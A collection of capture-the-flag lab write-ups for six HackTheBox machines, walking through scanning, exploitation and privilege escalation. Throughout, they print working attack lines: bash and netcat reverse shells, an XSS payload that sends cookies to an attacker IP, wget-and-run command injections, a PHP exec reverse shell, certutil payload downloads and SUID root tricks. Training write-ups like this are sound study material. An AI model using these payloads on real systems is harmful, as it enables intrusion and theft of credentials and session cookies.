HackTheBox Writeups

HackTheBox- BoardLight

Hello Folks,
In this blog, we are going to discuss as well as solve another easy machine of the HackTheBox platform named “BoardLight”. This machine is based on the Linux operating system and will help us understand how important it is to update the applications running on servers. Let’s begin the penetration testing process.
You guys can start the machine available on HackTheBox platform.
We know the process. First of all, we have to start with port scanning using the Nmap tool with the help of the following command:

nmap -sS <Machine_IP>

After completing the scan, we confirmed that 2 ports are open; 22 (SSH) and 80 (HTTP).

We know that we have to start the enumeration process using HTTP protocol for which we need to open our browser and type the machine IP address to access the website.
As we browsed through the website, we found an email address where the domain name of the website was mentioned. We can simply add the same on the “/etc/hosts” file so that we can access the website via the domain name (board.htb)
After that, we performed directory busting and got nothing special but when we performed subdomain enumeration using gobuster we got a result. The command is as follows:

gobuster vhost –url http://board.htb –append-domain -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt –exclude-length 301 2>/dev/null

Now, we have to add this subdomain to the “/etc/hosts” file so that we can access the webpage. We will explore the new subdomain on the browser and find a login page for Dolibarr which is an Enterprise Resource Planning software (ERP) and Customer Relationship Management software (CRM). Let’s research the default credentials of Dolibarr and after a few minutes, we found some. After trying them, we will find the username and password as admin.

Getting Foothold on BoardLight

After logging in as an admin user, we found the version of Dolibarr is 17.0.0. We researched the version on Google for vulnerabilities and found a CVE-2023-30253 which is vulnerable to PHP code injection. The exploit for the same is available on GitHub. Let’s clone the repository and run the Python script using the following command:

python3 script.py http://crm.board.htb admin admin <Kali_IP> 1337

Here, we have provided the target URL for Dolibarr with the login credentials. Also, we have provided the IP address and port number of our Kali machine where we have to start netcat listener using the following command:

nc -nlvp 1337

As soon as the listener starts, we have to run the Python script so that it can inject malicious code into the application and execute it. After a few seconds, we will receive a reverse shell connection on our Netcat listener.

We can see that we are currently “www-data” user. Now we have to get the user access here for which we need to know the user’s name. We can simply check the username by going to the /home folder and looking for the user’s home directory or we can simply read the contents of the /etc/passwd file. We will get the username “larissa”.
Now we have to escalate our privileges to become larissa user. We can use LinPEAS privilege escalation script which can provide us with the flaws that might allow us to become larissa user. We have to share this with the victim which can be simply done using the python3 web server with the help of the following command:

python3 -m http.server 8080

Now, after sharing the script with the victim machine, we can run the script and wait for it to show us results. After a few seconds, we will get the complete results. There is a file available on the web root directory which might contain the credentials so let’s read the file using the following command:

cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

In this file, we will find the credentials used for the database connection.

We can spray this password for other services or users. When we try this password for the larissa user we will find that it worked and we got the access as the larissa user. Now we can read the contents of the user.txt file.

Privilege Escalation on BoardLight

Let’s use SSH protocol to access as larissa user using the following command:

ssh larissa@<Machine_IP>

Now we have to perform horizontal privilege escalation and become root user. If we check the results of the LinPEAS script, we will find that there is a software called “Enlightenment” on which the SUID bit is set. Enlightenment is a window manager software for Linux machines. We can confirm the same using the following command:

find / -type f -perm -u=s 2>/dev/null

Let’s check the version of this software using the following command:

enlightenment –version

We will find that the version is “0.23.1”.

Now we have to search for a vulnerability in this version. We found a vulnerability CVE-2022-37706 which can be used to escalate our privileges to the root user if the SUID bit is set on this binary.
There is an exploit code written in bash that can help us here to become root user. The exploit is available on GitHub.
Let’s copy the bash code and save it in a new file on the target machine. Now we have to run the following commands to execute the code finally:

chmod +x cyberiumx-exploit.sh
bash cyberiumx-exploit.sh

We can see that we successfully become the root user and can finally read the contents of the root.txt file.

We successfully rooted the machine and learned how a vulnerable application version can provide access to any machine. Always remember to upgrade your software to the latest versions.
You can check out other blogs on HackTheBox machines on our website.

Happy Pentesting!
Team CyberiumX

HackTheBox- Headless

Hello folks,
In this blog post, our attention is directed towards the ‘Headless‘ machine, a beginner-friendly challenge featured on the HackTheBox platform. It presents an excellent learning opportunity for individuals keen on mastering Linux system penetration techniques. This challenge serves as an initial assessment to gauge your proficiency in conducting penetration tests on Linux servers.
As you navigate through the Headless machine challenge, you’ll have the chance to demonstrate your prowess in utilizing various Pentesting tools such as nmap, gobuster, netcat, Burp Suite, and wget. Join us as we embark on this thrilling journey of penetration testing.
To access the Headless machine on HackTheBox, simply click here.
First of all, let’s start the machine by clicking on ‘Join Machine’. Scan the obtained IP using the tool nmap.

nmap -sV <Machine_IP>

We will find two open ports; 22 (SSH) and 5000 (http). We can add the domain name of the IP which is headless.htb in /etc/hosts file. Now, we will try to access the website using the following URL:

http://headless.htb:5000

We can start directory bursting using gobuster with the help of the following command:

gobuster dir -u http://headless.htb:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 2>/dev/null

We can see that there are two pages available; /support and /dashboard. Let’s visit both of them to find our way into the machine.

Getting Foothold on Headless

Upon inspecting the /support page, it’s evident that there’s a contact form, while the /dashboard page remains inaccessible due to our non-logged-in status. To gain access to the dashboard, we must first log in to the application. After exploring the contact form on the /support page, we can potentially uncover vulnerabilities such as Command Injection or Cross-site Scripting (XSS). To initiate our investigation, we’ll input arbitrary values into the form and intercept the traffic using Burp Suite. Within Burp Suite’s HTTP proxy, we’ll locate a POST request directed towards the /support endpoint. We’ll then transfer this request to Burp Repeater for vulnerability testing.
We have to provide a payload that might capture the cookies of the admin user who will be looking into our support queries. The payload will be as follows:

<script>document.location=’http://<Your_Kali_IP>/?cookie=’+document.cookie</script>

Also, we can URL encode this payload by pressing Ctrl + u. With this payload, we also need to start an HTTP server with the help of the following command:

python3 -m http.server 80

At this stage, we need to test the XSS payload across all parameters present in the POST request, including message, email, User-Agent, and others. After testing, we’ll discover that the same payload must be inserted into two parameters specifically: message and User-Agent.

After waiting for a minute, we can see that we received the cookie of the admin user. Now we can add this cookie value on our browser using inspect element.
Browse to http://headless.htb:5000/dashboard to access the Administrator Dashboard. Here, you’ll encounter an option to generate the website’s health report for a particular date. Let’s intercept this request via Burp Suite and transfer another POST request to the repeater tool.
Within the body of this request, locate the date parameter. We’ll attempt to detect a command injection vulnerability using this parameter by employing the following payload:

&& pwd

Also, we can URL encode this payload by pressing Ctrl + u. Now, let’s send the request and check the response where we will find that the date parameter is vulnerable to command injection vulnerability.

Now, we need to get a reverse shell using this parameter so we can simply take the bash payload of Pentestmonkey (https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet). The payload is as follows:

bash -i >& /dev/tcp/<Your_Kali_IP>/1337 0>&1

We tried providing this payload directly on the date parameter but that didn’t help us gain the reverse shell. So, we can save this payload in a bash file and host this file on our web server so that we can first download this file on our victim machine and then execute it to get the reverse shell.
Let’s create a file (rev.sh) on our machine and save the above payload into it. We need to make this file executable and then finally run the Python3 HTTP server to host the file using the following command:

python3 -m http.server 80

After that, we need to provide the following payload into the date parameter:

&& wget http://<Your_Kali_IP>/rev.sh && bash rev.sh

We can also URL encode the above payload. Finally, we need to start the listener using netcat with the help of the following command:

nc -nlvp 1337

Now, after setting up everything we will switch to Burp Suite and click on Send button.
We will find that the rev.sh file is downloaded by the web server and then executed which results in getting a reverse shell on our netcat listener.

We got access to the dvir user. We can now access the contents of the user.txt file.

Privilege Escalation on Headless

Now it’s time to get root access on the target machine. We can start by checking the sudo privilege using the following command:

sudo -l

We can see that dvir user has permission to execute /usr/bin/syscheck binary as the root user. Let’s see the contents of this binary using the cat command.

We will find that there is a bash script (initdb.sh) that gets executed without specifying its full path. We can simply exploit this vulnerability by creating a malicious bash script with the same name. We need to run the following commands to achieve the same:

echo “chmod u+s /bin/bash” > initdb.sh
chmod +x initdb.sh

When we execute the syscheck binary, then our malicious script will be executed as it is in our current directory. This script will assign the root user’s SUID bit to the /bin/bash file. Let’s see this in action by running the following command:

sudo /usr/bin/syscheck

After running the above command, we need to execute the /bin/bash with the privileges of the owner (root). We can do this with the help of the following command:

/bin/bash -p

As soon as we run the above command, we will find that we have successfully escalated our privileges to the root user. Now we can simply access the contents of the root.txt file.
This machine provided a straightforward introduction to penetration testing on Linux systems, making it beneficial for beginners. We trust that you’ve grasped the underlying concepts explored within the Headless machine on HackTheBox.
You can explore the detailed write-ups for other machines of the HackTheBox platform on our website.

Happy Pentesting!!!
Team CyberiumX

HackTheBox- Bizness

Hello folks,
In this blog, we’re focusing on the ‘Bizness‘ machine, an entry-level challenge featured on the ‘HackTheBox‘ platform. It’s designed to provide a great learning opportunity for those interested in Linux system infiltration. This challenge serves as a starting point to assess your proficiency in Linux server penetration testing.
Throughout the Bizness machine challenge, you’ll get to showcase your skills in using Pentesting tools like nmap, gobuster, netcat, tcpdump, strings, and performing enumeration on potential exploits. So, let’s dive into this exciting journey of penetration testing.
To access the Bizness machine on HackTheBox, simply click here.
First of all, let’s start the machine by clicking on ‘Join Machine’.
Scan the obtained IP using the tool ‘nmap’.

nmap -sC <Machine_IP>

We have identified three accessible ports on this machine: 22 (SSH), 80 (HTTP), and 443 (HTTPS). Also, we are getting a domain name when we are trying to access the web page (bizness.htb). So let’s add this domain name in ‘hosts’ file stored at /etc/hosts on Linux machines.
Now, we can access the website available at https://bizness.htb

Let’s start the directory-busting using the gobuster tool to get the information on available web pages which we can explore with the help of the following command:

gobuster dir -u https://bizness.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -b 302 -t 20 2>/dev/null

We found a webpage where we are getting an error message related to ‘Apache Ofbiz’.

Getting Foothold on Bizness

If we search for any vulnerability available on Apache Ofbiz using the Google search engine, we will find that there is the latest flaw (CVE-2023-51467) which was discovered in December 2023. This vulnerability allows attackers to bypass authentication processes available on the website, granting them the ability to remotely execute any command on the web server.
It’s time to search for the exploit of this vulnerability. We found two GitHub repositories; one for confirming the vulnerability and another one to perform Remote Code Execution. Let’s use the first one to confirm whether our target website is vulnerable to this vulnerability or not using the following commands:

git clone https://github.com/Chocapikk/CVE-2023-51467.git
cd CVE-2023-51467
pip install -r requirements.txt
python3 exploit.py -u https://bizness.htb

We will find that the website is vulnerable and finally, we can perform RCE using the second exploit code to get our access on the target machine. Let’s use the following commands:

git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git
cd Apache-OFBiz-Authentication-Bypass
python3 exploit.py –url https://bizness.htb –cmd ‘whoami’

After running the whoami command, we’ll find that the output of the command is not shown to us in the response. Here we are exploring a blind vulnerability. To confirm whether our command is getting executed on the server or not, we have to try pinging our machine from the target machine. We can run a sniffer like tcpdump on our machine to receive the ping packets (ICMP). Let’s run the following commands on our machine in two different terminal windows:

sudo tcpdump -i tun0 icmp

python3 exploit.py –url https://bizness.htb –cmd ‘ping -c 2 <Your_IP>’

We can see that on tcpdump, we received the ICMP echo packets from the web server. This confirms that we can execute Linux OS commands on our target machine. Now, we have to use a one-liner reverse shell command to get access to the target machine. We can use the reverse shell commands available on Pentestmonkey. I tried the one-liners available for Bash, python, and Netcat but only the following payload worked:

python3 exploit.py –url https://bizness.htb –cmd ‘nc -e /bin/bash <Your_IP> 1234’

Before running the above command, we have to make sure that we are listening on the 1234 port using netcat tool.

We can see that we are ofbiz user and can read the user.txt file.

Privilege Escalation on Bizness

Now, we have to find our way to the root user for solving the machine. Let’s first improve the shell by running the following command on the target machine:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc <Your_IP> 1337 >/tmp/f

Before running the above command, we have to make sure that we are listening on the 1337 port using netcat tool. We will find a better shell this time.
We tried different methods for getting root access on this machine but they didn’t work. Finally, we ran the following command to search for the passwords available on the machines:

find / -type f -exec grep -i “admin” \; 2>/dev/null

After running this command we found many results out of which there were many SHA-1 hashes available. So, we searched for the directory path where these files are available using the following command:

find / -type f -exec grep -Rl “SHA” \; 2>/dev/null

We found many directories out of which one contains the actual password salted hash ‘runtime/data/derby/ofbiz/seg0’. If we go into this directory, we will find that there are many ‘.dat‘ files available. Dat files are generally supporting files that contain data related to any program/application. We cannot read the contents of dat files but we can use strings to check if there is any specific hash value available on these files. Let’s run the following command to grep the hash value:

strings * | grep “SHA”

After running the above command we can see that we got the value of hash where ‘d’ is the used salt. Now let’s find a way to crack the hash. We can write a Python code to perform the same. The code is available on our Official GitHub Repository. You just have to provide the hash value into the code and then execute the Python script as follows:

python3 <name of your python script>

After a few seconds, we will find the password which we have to try on different functionalities. Let’s try the password for the root user using the following command on the target machine:

su

After running this command, type the password and we will find that we got the root access of the target server machine. Finally, we can read the contents of the root.txt file.

This machine was overall an easy level machine but the Privilege Escalation part was a little time-consuming. We hope you understand the concepts behind the Bizness machine of HackTheBox.
You can explore the detailed write-ups for other machines of the HackTheBox platform on our website.

Happy Pentesting!!!
Team CyberiumX

HackTheBox- Hospital

Hello folks,
This blog focuses on the ‘Hospital‘ machine, a Medium-level challenge available on the ‘HackTheBox‘ platform. It serves as an initial assessment to evaluate your expertise in Windows server penetration testing. During the ‘Hospital‘ machine challenge, you’ll get to showcase your proficiency with Pentesting tools like nmap, gobuster, netcat, john, git, rpcclient, certutil, and conducting enumeration on public exploits. Without delay, let’s dive into this penetration testing adventure.
You can access the Hospital machine on HackTheBox platform.
First of all let’s start the machine by clicking on ‘Join Machine’ and scan the obtained IP using the tool ‘Nmap’.

nmap -sS <Machine_IP>

We can see that 20 ports are open on the target Windows machine. From these outputs, we can say that the target machine is a Domain Controller in an Active Directory environment. Out of these 20 ports, there are two HTTP ports available on the machine i.e. 443 and 8080. So, we have to open our web browser and visit the webpage available on these ports.

We will find two different login pages available on these ports. The one running on port 443 is of Webmail and the other one has a registration page available. Let’s try to register for an account with our details.

Once we’ve registered our account, we’ll attempt to log in using the provided username and password. After successful login, we’ll discover a file upload feature on the webpage.

Next, we’ll click on ‘Browse‘ to explore the permitted file types for upload. It turns out that images are allowed for uploading. Our goal is to attempt uploading a malicious webshell, granting us access to the target machine. Additionally, considering the server configuration present in PHP-based web pages such as login.php, index.php, register.php, etc., we can infer that PHP is the server-side language in use. Thus, uploading a malicious PHP file seems viable for gaining access. To determine the upload location, we’ll utilize the ‘gobuster‘ tool with the following command:

gobuster -dir http://<Machine_IP>:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt –x txt,php -t 20 2>/dev/null

We found a ‘uploads‘ named directory. Now, let’s try to upload the most popular php webshell (php-reverse-shell.php from Pentestmonkey) that we have on our Kali machine at /usr/share/webshells/php location. We have to make sure that we have mentioned our tunnel IP of HackTheBox VPN in the reverse shell file. If we upload the file with the .php extension, the file is not allowed to be uploaded. So, we have to try to upload multiple formats of php to confirm which one is allowed to upload. The application must be using a blacklist validation here.
After trying many extensions like php, php5, php3, phtml, etc., we found that only .phar extension was uploaded successfully on the server. Now it’s time to get the reverse shell of the web server for which we have to execute this malicious file stored in /uploads directory and start netcat listener on the Kali machine using following command:

nc -nlvp 1234

When we try to execute the php-reverse-shell.phar file, the connection request comes but suddenly it disconnects. Every time the output was the same. So, we have to try and upload any other kind of php webshell. We can try another one called p0wny shell. We can use this to get the shell of the target server over the web only. Let’s download the webshell file from the website and change the extension to .phar and upload the file on the website.
When we try to execute the file using following URL, we will find the shell on the website itself:

http://<Machine_IP>:8080/uploads/p0wny.phar

We can confirm that we are ‘www-data’ user after executing the whoami command. But this was supposed to be a windows machine, right HackTheBox! This must be the Windows subsystem for Linux. We have to find our way to another machine which should be running Windows OS. Let’s continue. Now in order to improve this shell, we can use the following command where, we need to provide our VPN IP and any available port:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Our_IP> 1234 >/tmp/f

Let’s go to the terminal and start netcat listener using following command:

nc -nlvp 1234

Now execute the command on webshell so that we can get the reverse shell access on netcat listener.

After successfully getting access on our machine, we need to perform privilege escalation. So, let’s start from the kernel version of the target machine which we can check with the help of following command:

uname –a

If we search this version on Google, we will find that this is vulnerable with local privilege escalation.
In order to exploit and get root shell, we need to run the following command:

unshare -rm sh -c “mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;” && u/python3 -c ‘import os;os.setuid(0);os.system(“cp /bin/bash /var/tmp/cyberiumx && chmod 4755 /var/tmp/cyberiumx && /var/tmp/cyberiumx -p && rm -rf l m u w /var/tmp/cyberiumx”)’

We got root access on the machine. Now from here we need to find something which might provide us an attack vector to access the windows machine. Let’s check the /etc/shadow file to get the password hashes using following command:

cat /etc/shadow

We identified a user account with ‘drwilliams’ username and we got the password hash of the user. Let’s try to crack the password of this user so that we can use the username and password on any authentication functionality. We can use ‘John the Ripper’ tool to easily crack the password with the help of a wordlist as follows:

john –wordlist=/usr/share/wordlists/rockyou.txt hospital.creds

After sometime, we get the password of drwilliams user. Now we have to use this username and password against the target machine. We can try these credentials for various services like RDP, RPC, SMB, HTTP, SSH, etc. After trying them everywhere, finally it worked on the login page of Webmail available at https://<Machine_IP>.

On Webmail, we will find an email in our inbox. Let’s click on the email to read the contents of it. We will find that the email for sent from user ‘drbrown’ and in the mail an .eps extension is mentioned which needs to be virtualized with GhostScript.

We researched for eps extension and GhostScript and found that eps is an extension used to place images or graphics within the PostScript documents. GhostScript is a software used to read PDFs and PostScripts.
So, we have to find a method using which we can generate a malicious eps file and send it to drbrown user. After searching the same on Google, we found that there is a remote code execution vulnerability related to eps files.

There is a Github repo available for ‘GhostScript Command Injection’ which we have to clone on our machine using the following command:

git clone https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection.git

We have a python script and an eps file available in this repository with some examples available on the github repository using which we can understand how we have to execute commands and exploit this vulnerability.
Firstly, we have to create an eps extension file which will download windows netcat binary on the target system and secondly we have to execute that netcat binary and get the reverse shell of the target machine.
Let’s start by creating a malicious eps file to download the netcat binary (nc64.exe) on target machine using a windows based utility called certutil with the help of following command:

python3 CVE_2023_36664_exploit.py –inject –payload “certutil -urlcache -f http://<Kali_IP>:7777/nc64.exe nc.exe” –filename file.eps

Also, we have to locate and host the nc64.exe binary on our web server at any available port number using the following commands:

locate nc64.exe
python3 -m http.server 7777

After doing this, we have to go to the webmail portal and compose the mail. We will send this mail to drbrown user on his email address which is drbrown@hospital.htb and then we will attach the malicious eps file that we just created and send the mail.

Now, we have to wait for a few seconds and if everything is okay then we should definitely find a log on python3 web server stating that the target server has successfully downloaded the nc64.exe binary on his machine.

Let’s create the second payload to get the reverse shell using netcat with the help of following command:

python3 CVE_2023_36664_exploit.py –inject –payload “nc.exe <Kali_IP>1234 -e cmd.exe” –filename file.eps

Again we have to compose an email and send it to drbrown user with this second malicious file. Also, we have to start listening using netcat with the help of following command:

nc –nlvp 1234

Once the eps file is executed by the target user, we will get the reverse shell.

We are drbrown user and now can read the user.txt file. We have a bat file in Documents folder ‘ghostscript.bat’. Let’s try to read the file using following command:

type ghostscript.bat

We found a password in this file which can be used somewhere. Again, we have to try this password everywhere and after trying we found that the password is working on RPC using a tool called rpcclient as follows:

rpcclient -U “drbrown”<Machine_IP>

After getting the shell of rpcclient, we can run the following command to get the description for different users on the target machine:

querydispinfo

We will find that the Guest user can access the administrator information which means that if we upload any file on the web server then we should get the Administrator level access on the machine.
Let’s change the directory to the web directory (c:\xampp\htdocs) and download the p0wny shell from our machine using certutil utility as follows:

On our machine- python3 –m http.server 7777
On target machine- certutil -urlcache -f http://<Kali_IP>:7777/p0wny.php shell.php

Now, we have to visit the following URL and get the webshell:

https://<Machine_IP>/shell.php

We will find that we got the shell on the website as ‘System’ user. Finally, we can access the root.txt file.

Upon finishing this room, you should have gained an understanding of numerous concepts and gained practical experience with various pentesting tools.
You guys can check out our other blogs for HackTheBox machines on CyberiumX.

Happy Pentesting!!!
Team CyberiumX

HackTheBox- Clicker

Hello folks,
This blog focuses on the ‘Clicker‘ machine, a Medium-level challenge offered on the ‘HackTheBox‘ platform. It serves as an introductory evaluation to assess your competency in Linux server penetration testing. During the ‘Clicker‘ challenge, you’ll get the opportunity to showcase your abilities using Pentesting tools like Rustscan, mount, Burp Suite, Ghidra, and performing enumeration on public exploits. Without delay, let’s commence this journey into penetration testing.
You can access the Clicker machine on HackTheBox.
First of all let’s start the machine by clicking on “Join Machine”.
Scan the obtained IP using the tool “Rustscan”.

rustscan -a <Machine_IP>

We can see that port 22 (SSH), 80 (HTTP), 111 (RPC), 2049 (NFS), and some other ports related to mountd.
If the machine has an open NFS port, we can utilize the ‘showmount‘ command to collect information about the shared directory, as illustrated below:

showmount -e 10.10.11.232

The ‘/mnt/backups‘ directory is shared with everyone on the network (*), allowing us to easily mount it onto our system. To do this, we’ll first create a directory and then use the mount command as shown below:

mkdir nfs
sudo mount -t nfs <Machine_IP>:/mnt/backups nfs/

We’ve effectively mounted the share onto our ‘nfs‘ directory, and within it, there’s a compressed file named ‘clicker.htb_backup.zip‘.

As we’re unable to decompress the file within this directory, we’ll need to copy the file to our designated directory. Once transferred, we can utilize the ‘unzip‘ command to decompress the file, as demonstrated below:

cp clicker.htb_backup.zip ~
unzip clicker.htb_backup.zip

A directory named ‘clicker.htb‘ has been created. Let’s navigate into this directory and list its contents. Inside, we’ll discover numerous PHP files resembling web server-side files.

Next, let’s access the website using the IP address. Upon doing so, we’ll notice that the IP address is associated with the domain name ‘clicker.htb‘. To access the site properly, let’s modify our hosts file located in the /etc folder by adding an entry for this domain. After updating the hosts file, we can access the website using the domain name.

On the homepage, there are options for ‘Register‘ and ‘Login‘. Let’s proceed by creating a new user profile using the ‘Register‘ functionality and then log in using the credentials of the newly created user.

Upon successful login, there’s a game accessible through the ‘Play‘ option. In this game, the objective is to click on the mouse icon as many times as possible. After playing, we can save the game and then exit.

Let’s navigate back to the directory containing the source code of the webpage written in PHP. Our aim is to explore the code to uncover any elements that could potentially grant us access to the machine.
After examining the ‘save_game.php‘ and ‘admin.php‘ files, we’ve identified certain parameters such as ‘clicks‘, ‘level‘, and ‘role‘ Among these parameters, the ‘role‘ parameter seems intriguing as it could potentially guide us towards an admin user.

To identify these parameters accurately, we must route our requests through Burp Suite. While playing the game again, we inspected the requests in Burp Suite. We noticed a request to the ‘/save_game‘ endpoint containing two of the aforementioned parameters, but the ‘role‘ parameter doesn’t appear to be utilized here.

When we took this request to Repeater and attempted to include a ‘role‘ parameter pointing to the admin user, an error was triggered, indicating malicious activity. Despite attempting URL encoding and various techniques, none were successful. However, after numerous attempts, we performed a CRLF injection, which worked flawlessly, resulting in a message confirming that the game was saved.

Now if we log in again to our account, we will find that we have another option ‘Administration’ added on our home page.

Clicking on this option reveals additional functionality added to our account. We have access to the data of all players who’ve created accounts, which can be exported in various formats. Clicking the export button saves a file with a unique name in the /exports directory. By altering the URL to ‘exports‘, we can view the details of all users stored in that file.

Let’s proceed to Burp Suite and bring up this request in the Repeater. If we attempt to modify the file extension to ‘php‘ (considering our knowledge that the target web server’s language is PHP), we’ll observe that the file is generated with a PHP extension, allowing us to access it effortlessly.

To inject malicious code into the PHP extension file and gain access to the machine, we’ll need to further explore the obtained source code of the website to identify additional parameters or vulnerabilities that could assist in executing this attack. This could involve scrutinizing various files, directories, and scripts within the website’s source code to pinpoint potential entry points for injecting malicious code.
After examining the ‘exports.php‘ and ‘authenticate.php‘ files, we’ve identified another parameter named ‘nickname‘ that appears to be a potential avenue for injecting malicious PHP code.

Additionally, we’ve found a ‘nickname‘ parameter that operates alongside the ‘clicks‘ and ‘level‘ parameters, suggesting our focus should return to the ‘save_game.php‘ file. Let’s return to Burp Repeater and include another parameter, ‘nickname‘, with a value pointing to a malicious PHP reverse shell code, as shown below:

<?php exec(“/bin/bash -c ‘bash -i > /dev/tcp/<Your_IP>/1234 0>&1′”); php?>

When sending the request, we should include our IP address and an available listening port for the reverse shell. Upon sending the request, if we observe that the game is saved, it indicates that the request has been accepted.

After sending this request we need to forward another request to export.php endpoint with PHP extension.

Now we need to start the listener before executing the file using following command:

nc –nlvp 1234

Running the PHP file that initiated the reverse shell on our netcat listener. Presently, we’re operating as the ‘www-data‘ user, while another user named ‘jack‘ is accessible on the system.

Getting User Access on Clicker

To elevate our privileges to the ‘jack‘ user and access ‘user.txt‘, we’ll need to explore ways to escalate permissions. Exploring all system directories on the target machine is crucial. Within the /opt directory, there are several files that require analysis to identify any potential paths for privilege escalation.
Within the ‘manage‘ directory, there are two files: one appears to be a text file, while the other seems to be a binary. Let’s inspect the contents of the text file.

The text file suggests that the binary is utilized for tasks such as creating, adding, resetting, and deleting website users. To examine the binary, we’ll utilize analysis tools like Ghidra or IDA Pro. Let’s download the file onto our machine using the commands below:

python3 –m http.server 8888
wget http://<Machine_IP>:8888/execute_query

Now we can download and install Ghidra using following commands:

sudo apt install ghidra

Finally we can start the tool using following command:

ghidra &

We have to import the execute_query binary into Ghidra.

Upon successful import, our objective is to analyze the code to identify any potential vulnerabilities within the source code. To do this, we’ll focus on locating the main function file, which typically contains a critical set of code for the binary.
The code structure comprises four distinct cases labeled as 1, 2, 3, and 4. Attempting to input values other than these predefined cases could potentially trigger an error or exception.

Upon attempting an input outside of the specified cases, an error emerged indicating, ‘File not readable or not found‘. This implies that the binary, with the owner ‘jack‘ and the SUID bit set, potentially allows reading files from specific directories as the ‘jack‘ user. However, certain conditions must be met: the file should be readable by the ‘jack‘ user, and the file path must be accurate. We experimented with various file paths to read files and ultimately succeeded in accessing the contents of the ‘id_rsa‘ file stored in Jack’s home directory using the command below:

./execute_query 5 ../.ssh/id_rsa

Copy the contents of the SSH Private Key and paste it into a new file on our machine. Additionally, grant limited permissions to this private key file using the following command:

chmod 600 <private_key_file>

Now we can simply get the access of jack user using the following SSH command:

ssh -i <private_key_file> jack@<Machine_IP>

We are jack user. We can read the contents of the user.txt file.

Privilege Escalation on Clicker

Now, we need to find a way to perform Privilege escalation on the machine to upgrade our shell. Let’s start with identifying sudo privileges using the following command:

sudo -l

It appears that we have the capability to execute all commands using sudo, but this requires the password of the ‘jack‘ user. Attempting to change the password of the ‘jack‘ user necessitates knowledge of the current password, which we currently lack.
Additionally, there’s another set of commands that enable us to set environment variables for the /opt/monitor.sh file as the root user, without requiring any password. Although more complex, we should explore this possibility as well. Let’s check out the contents of this file.

Upon careful examination of the code, it’s evident that the script attempts to execute an unusual binary located at /usr/bin/xml_pp. However, when inspecting the contents of this binary, it appears not to be an actual binary but rather a Perl script.

We need to conduct online research to find information that might assist us in this context concerning the file and Perl language. During our investigation, we came across a vulnerability known as ‘perl_startup‘ that could be relevant and might provide a solution. I recommend exploring this vulnerability further for potential insights into our situation.
We have two potential methods to exploit this situation: employing the Metasploit framework or directly executing a command that sets environment variables for this script to execute. Our approach will involve using the second method, executing a command using the following syntax:

sudo PERL5OPT=-d PERL5DB=’exec “chmod u+s /bin/bash”‘ /opt/monitor.sh

The command leverages two Perl environment variables to modify the permissions of the /bin/bash binary and set the SUID bit on it.
The next command we need is to execute bash binary with the permission of root user using the following:

/bin/bash -p

And Boom!! We got root access on the machine. We can simply read the contents of root.txt.

Ultimately, Clicker is now under our control. Throughout this journey, we delved into various techniques encompassing NFS, Perl exploits, PHP webshells, and binary decompilation (reverse engineering).
You guys can check out our other blogs for HackTheBox machines.

Happy Pentesting!!!
Team CyberiumX

HackTheBox- Analytics

Hello folks,
This blog is dedicated to the ‘Analytics‘ machine, a beginner-level challenge available on the ‘HackTheBox‘ platform. It offers an excellent opportunity to gain experience in Linux system infiltration. This task serves as an initial assessment to gauge your proficiency in the field of server penetration testing. Throughout the ‘Analytics‘ machine challenge, you will have the chance to demonstrate your skills in utilizing Pentesting tools such as Nmap, Rustscan, Metasploit-Framework, and conducting enumeration on public exploits. Without further ado, let’s embark on this penetration testing journey.
You can access the Analytics machine on HackTheBox platform by clicking here.

First of all let’s start the machine by clicking on “Join Machine”.
Scan the obtained IP using tool “NMAP”.

nmap -sC <Machine_IP>

We have identified two accessible ports on this machine: 22 (SSH) and 80 (HTTP). Also we are getting a domain name in the result of nmap ‘analytical.htb‘. So let’s add this domain name in hosts file stored at /etc/hosts on Linux machines.

The website is currently reachable via port 80. The webpage is rich with hyperlinks, and the one located beneath the ‘Login‘ button directs us to a different subdomain, specifically, ‘data.analytics.htb‘.

Getting Foothold on Analytics

Let’s add this new domain name in hosts file and try to access the web page.

We’ve identified a Metabase login page, which is an open-source platform for business intelligence. Despite extensive enumeration to discover potential usernames for a brute-force attack, we couldn’t find any viable options. As a result, I conducted an online search to explore potential vulnerabilities associated with this platform and uncovered one that was recently discovered this year. It’s identified as CVE-2023-33246, and it allows Remote Code Execution (RCE) against the target.

So, we researched a lot and finally got one exploit available on Metasploit framework for this vulnerability.

Let’s now fire-up Metasploit Framework and search for the exploit related to Metabase using the following commands:

msfconsole
search metabase
use exploit/linux/http/metabase_setup_token_rce
show options

Now let’s try to set options before exploiting the target using following commands:

set rhosts data.analytical.htb
set lhost tun0
set lport 80

Now finally fire-up the exploit and we can see that we successfully got the access as metabase user.

However, despite our efforts, we have not yet obtained user access on the machine. We continued to explore various methods, but none of them yielded the desired results. Ultimately, we decided to inspect the environment variables within the accessed shell and uncovered something of a confidential nature stored within two distinct variables. To list all the environment variables, we can use the following command:

printenv

So let’s try to access the user level privilege using SSH protocol with the help of following command:

ssh <username>@<Machine_IP>

We have to provide the password for the identified user and boom!!! We got the user access.

We can go to the user directory and read the contents of user.txt.

Privilege escalation on Analytics

Now, it’s time to elevate our privileges to root user. We attempted various methods, but none of them proved successful. We also explored the environment variables again but found no relevant information. At this point, we decided to check the Ubuntu machine’s OS version and discovered that it was indeed vulnerable.

The exploit available for this vulnerability is available over here.
Let’s simply clone the repo and compile it with the help of GCC using following commands:

git clone https://github.com/briskets/CVE-2021-3493.git
gcc exploit.c -o CyberiumX

Now we need to share this exploit file “CyberiumX” with our victim machine which we can simply do with the help of Python3 HTTP server using following command:

python3 -m http.server 7777

We have to download this file on our victim machine using wget command as follows:

wget http://<Your_machine_IP>:7777/CyberiumX

Let’s provide the executable permission to this file using chmod command:

chmod +x CyberiumX

Finally, we have to execute the exploit code using the following command which in return will provide us the escalated shell of root user:

./CyberiumX

